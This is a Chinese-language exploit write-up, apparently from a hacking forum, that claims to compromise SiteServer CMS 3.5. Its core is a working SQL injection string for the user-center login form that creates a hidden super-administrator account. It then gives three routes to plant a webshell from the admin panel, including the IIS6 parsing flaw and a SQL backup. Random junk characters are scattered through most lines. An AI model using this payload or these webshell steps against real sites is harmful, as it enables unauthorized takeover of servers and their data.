经测试秒杀最新的3.5版$ o$ A3 \7 h2 \2 r5 z% v% p
4 p0 ~0 l- f8 ]% @( O! `/ Hstieserver官网:www.siteserver.cn0 f+ H- B1 ^& c9 b) Y7 P$ }
, B; p6 `! y$ m2 T5 U
' U3 p. J8 Z4 _9 R7 n
2 `& K( Q. R- e1 z8 nEXP:3 A) x, J7 ~; f- h6 M( y' K/ B$ h
, a) d4 ?% u, ]( W9 I- W0 x' C
直接访问UserCenter/login.aspx
7 F* o. S1 z! i
: { j" D+ q, Z
- V& i7 b$ |3 B
( e/ Y, x7 @, I/ W6 I& J7 c用户名处输入:( u" ], Z+ C: L: Z' w1 ^( @
9 v9 Q Q9 v3 K123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--% k6 b( ?! S4 C" C9 C) d
: G1 t( g# O" J
4 _) y* f* }: h, m; @ _1 p4 B/ J m: \$ G. N
密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。& Y/ m) ~ z: ]
) X& `2 P- L, T
/ ^% r" I' a: k! f1 z" b4 ^0 Y' k3 {7 i3 z6 M
之后再访问后台SiteServer/login.aspx用插入的用户登陆' [: [8 W' }) T
9 {" C2 R$ U: r& T
% Q' t) F! j" {) N( K0 i6 g% k' N1 d- S: O- t6 I/ N
后台拿webshell的三种方法:
2 c, v9 i0 B3 e! I/ r7 h6 F Q- ?1 h* n7 o; j0 r/ d
一、
0 J# e$ K% i6 @9 D0 q
9 @- E& y0 b/ P; i5 v2 h# z: I站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
$ n( j% n7 e8 O$ }4 l% e8 {6 Z
0 D9 r; E c& t& R9 `. e( l二、# d# P% K3 r! C8 p" `
0 ]. |! P* s9 W* R, A% R成员权限-》添加用户-》用户名为:1.asp
7 t5 r! q' P5 Z+ K- u
" D2 n5 v' Y/ i# Fhttp://127.0.0.1/usercenter/4 U8 k" f* S8 \
- M- X, U* p% D6 p7 Z, D' Z用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
3 a9 ], x7 d! M+ |. f. c3 d; E) y/ H0 c! O% j3 m$ K: d! E8 s* h+ Z4 Q
(ps:后台添加用户时不会验证是否含有非法字符)2 S2 }; v1 l$ f; D
1 C4 |4 j u. R7 N! S
三、6 l: [- g& O |# ~; v
# Y# a& `5 H5 A: U4 _; L; q, ]1 O
系统工具-》实用工具-》机器参数查看
+ M" u" z% X4 }& h0 [可以看到数据库类型、名称,WEB路径8 Z9 |1 J5 X5 h) v
1 s% l1 S7 S% u) V6 s1 X
系统工具-》数据库工具-》SQL语句查询
g6 E2 A# A o" B. d( C( m这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO。$ W. g, H7 ~! z, X
3 W8 r8 U. M! W9 B% |) D |